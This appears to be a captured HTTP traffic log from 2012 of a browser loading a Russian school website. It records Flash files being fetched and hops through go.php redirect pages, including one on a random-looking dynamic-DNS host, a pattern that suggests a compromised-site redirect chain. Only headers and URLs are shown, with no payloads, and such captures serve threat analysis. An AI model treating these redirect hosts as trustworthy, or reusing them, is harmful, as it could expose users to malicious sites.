GET /Recycle%201.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:10 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:30 GMT Etag: "3dd432-f83e-d02d8080" Accept-Ranges: bytes Content-Length: 63550
GET /2.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd427-8e-ce63bd00" Accept-Ranges: bytes Content-Length: 142
GET /3.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42a-5da-ce63bd00" Accept-Ranges: bytes Content-Length: 1498
GET /4.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:00 GMT Etag: "3dd42b-c71-ce63bd00" Accept-Ranges: bytes Content-Length: 3185
GET /1.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:22 GMT Etag: "3dd423-468f-cfb36e80" Accept-Ranges: bytes Content-Length: 18063
GET /ukfdyfz/%D0%B3%D0%BB%D0%B0%D0%B2%D0%BD%D0%B0%D1%8F.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Location: http://www.lipetsk.ru/errors/404.html Content-Length: 221
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT Etag: "289dff-26c-4cb2ceb2654c0" Accept-Ranges: bytes Content-Length: 620 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: keep-alive
GET /clock6.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:01 GMT Etag: "3dd42e-f58-ce72ff40" Accept-Ranges: bytes Content-Length: 3928
GET /style.css HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1	HTTP/1.1 200 OK Content-Type: text/css Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Last-Modified: Wed, 13 Apr 2011 13:57:32 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Vary: Accept-Encoding Content-Encoding: gzip
GET /5.swf HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:11 GMT Connection: close Last-Modified: Fri, 03 Feb 2006 12:11:20 GMT Etag: "3dd42d-3b73-cf94ea00" Accept-Ranges: bytes Content-Length: 15219
GET /hit?t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 02:36:12 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 Content-Length: 32 Expires: Sun, 06 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1Gc7US0drzn2; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /images/logo.png HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.host-food.ru/style.css	HTTP/1.1 200 OK Content-Type: image/png Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Content-Length: 11341 Last-Modified: Thu, 19 Jan 2012 21:20:54 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /hit?q;t45.6;rhttp%3A//www.sc62.lipetsk.ru/;s117688524;uhttp%3A//h39086.srv0.test-hf.ru/go.php%3Fsid%3D1;h%u0421%u0430%u0439%u0442%20%u0437%u0430%u0431%u043B%u043E%u043A%u0438%u0440%u043E%u0432%u0430%u043D;0.28823289101178884 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://h39086.srv0.test-hf.ru/go.php?sid=1 Cookie: FTID=1Gc7US0drzn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 02:36:12 GMT Server: 0W/0.8c Connection: Close Content-Length: 104 Expires: Sun, 06 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3KRk6B00xj12; path=/; expires=Tue, 05 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /setcookie.php?backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/	HTTP/1.1 302 Found Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 02:36:12 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Vzd=1; expires=Wed, 07 Nov 2012 02:36:12 GMT Location: http://www.lipetsk.ru/errors/404.html?pass=1&backurl=/errors/404.html&
GET /images/stop.png HTTP/1.1 Host: www.host-food.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.host-food.ru/style.css	HTTP/1.1 200 OK Content-Type: image/png Server: nginx/1.2.4 Date: Tue, 06 Nov 2012 02:36:12 GMT Content-Length: 10949 Last-Modified: Thu, 27 Jan 2011 15:47:38 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 Host: www.lipetsk.ru GET /errors/404.html?pass=1&backurl=/errors/404.html& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/ Cookie: Vzd=1	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx/0.7.63 Date: Tue, 06 Nov 2012 02:36:12 GMT Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: Ccnt[/errors/404.html]=1; expires=Wed, 07 Nov 2012 02:36:12 GMT
GET /favicon.ico HTTP/1.1 Host: www.sc62.lipetsk.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: image/x-icon Server: nginx/0.5.26 Date: Tue, 06 Nov 2012 02:36:12 GMT Connection: close Last-Modified: Tue, 10 Jul 2007 10:48:55 GMT Etag: "3dd796-0-81fff3c0" Accept-Ranges: bytes Content-Length: 0
GET /go.php?sid=3 HTTP/1.1 Host: gkq522w1rpehodjob.ipq.co User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.sc62.lipetsk.ru/